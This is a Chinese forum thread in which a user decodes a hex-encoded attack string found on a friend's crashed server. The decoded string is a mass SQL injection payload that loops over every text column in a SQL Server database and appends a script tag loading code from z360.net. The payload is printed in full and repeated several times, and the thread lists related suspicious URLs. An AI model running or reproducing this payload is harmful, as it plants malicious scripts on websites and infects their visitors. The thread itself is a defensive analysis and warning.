一个数据库挂马的例子
今天朋友发给我一段数据说服务器崩了,让我给分析一下,加密数据见附件。打开文件,发现是以%隔开的,很明显是16进制,把16进制转化为字符串后得到。
;DeCLaRE @S NvArCHaR(4000);SeT @S=CaSt(0x4400650063006C00610072006500200040005400200056006............省略)
很明显是SQL挂马,中间那段数据没解出来,凭经验以0x开头的数据也是16进制的,转化为字符看看。
中间数据解码后,得到最终结果:
;DeCLaRE @S NvArCHaR(4000);SeT @S=CaSt(Declare @T Varchar(255),@C Varchar(255) Declare Table_Cursor Cursor For Select A.Name,B.Name From Sysobjects A,Syscolumns B Where A.Id=B.Id And A.Xtype='u' And (B.Xtype=99 Or B.Xtype=35 Or B.Xtype=231 Or B.Xtype=167) Open Table_Cursor Fetch Next FromTable_Cursor Into @T,@C While(@@Fetch_Status=0) Begin Exec('update ['+@T+'] Set ['+@C+']=Rtrim(Convert(Varchar(8000),['+@C+']))+''<script src=http://z360.net></script>''')Fetch Next FromTable_Cursor Into @T,@C End Close Table_Cursor Deallocate Table_Cursor aS NvArChAR(4000));ExEc(@S);--@S NvArCHaR(4000);SeT @S=CaSt(Declare @T Varchar(255),@C Varchar(255) Declare Table_Cursor Cursor For Select A.Name,B.Name From Sysobjects A,Syscolumns B Where A.Id=B.Id And A.Xtype='u' And (B.Xtype=99 Or B.Xtype=35 Or B.Xtype=231 Or B.Xtype=167) Open Table_Cursor Fetch Next FromTable_Cursor Into @T,@C While(@@Fetch_Status=0) Begin Exec('update ['+@T+'] Set ['+@C+']=Rtrim(Convert(Varchar(8000),['+@C+']))+''<script src=http://z360.net></script>''')Fetch Next FromTable_Cursor Into @T,@C End Close Table_Cursor Deallocate Table_Cursor aS NvArChAR(4000));ExEc(@S);--@S NvArCHaR(4000);SeT @S=CaSt(Declare @T Varchar(255),@C Varchar(255) Declare Table_Cursor Cursor For Select A.Name,B.Name From Sysobjects A,Syscolumns B Where A.Id=B.Id And A.Xtype='u' And (B.Xtype=99 Or B.Xtype=35 Or B.Xtype=231 Or B.Xtype=167) Open Table_Cursor Fetch Next FromTable_Cursor Into @T,@C While(@@Fetch_Status=0) Begin Exec('update ['+@T+'] Set ['+@C+']=Rtrim(Convert(Varchar(8000),['+@C+']))+''<script src=http://z360.net></script>''')Fetch Next FromTable_Cursor Into @T,@C End Close Table_Cursor Deallocate Table_Cursor aS NvArChAR(4000));ExEc(@S);--@S NvArCHaR(4000);SeT @S=CaSt(Declare @T Varchar(255),@C Varchar(255) Declare Table_Cursor Cursor For Select A.Name,B.Name From Sysobjects A,Syscolumns B Where A.Id=B.Id And A.Xtype='u' And (B.Xtype=99 Or B.Xtype=35 Or B.Xtype=231 Or B.Xtype=167) Open Table_Cursor Fetch Next FromTable_Cursor Into @T,@C While(@@Fetch_Status=0) Begin Exec('update ['+@T+'] Set ['+@C+']=Rtrim(Convert(Varchar(8000),['+@C+']))+''<script src=http://z360.net></script>''')Fetch Next FromTable_Cursor Into @T,@C End Close Table_Cursor Deallocate Table_Cursor aS NvArChAR(4000));ExEc(@S);--@S NvArCHaR(4000);SeT @S=CaSt(Declare @T Varchar(255),@C Varchar(255) Declare Table_Cursor Cursor For Select A.Name,B.Name From Sysobjects A,Syscolumns B Where A.Id=B.Id And A.Xtype='u' And (B.Xtype=99 Or B.Xtype=35 Or B.Xtype=231 Or B.Xtype=167) Open Table_Cursor Fetch Next FromTable_Cursor Into @T,@C While(@@Fetch_Status=0) Begin Exec('update ['+@T+'] Set ['+@C+']=Rtrim(Convert(Varchar(8000),['+@C+']))+''<scri
数据库中被插入了<script src=http://z360.net></script>',google一下z360.net 发现最近被这个挂马的站很多。
提醒大家注意。 太深奥了,这个不懂。。。学习。。。 Log is generated by FreShow.
http://z360.net
http://z360.net/0.htm
http://ddyyb.2288.org/fkzd/16.htm//连接超时
http://js.tongji.linezing.com/464215/tongji.js 这个应该是个存储过程吧,里面用到了数据库的指针:lol 没好好格式化下代码 本事不行这么看老费劲 这个高手了,就这样也看懂了 无法学习,只能膜拜,能提供原始样本不?
页:
[1]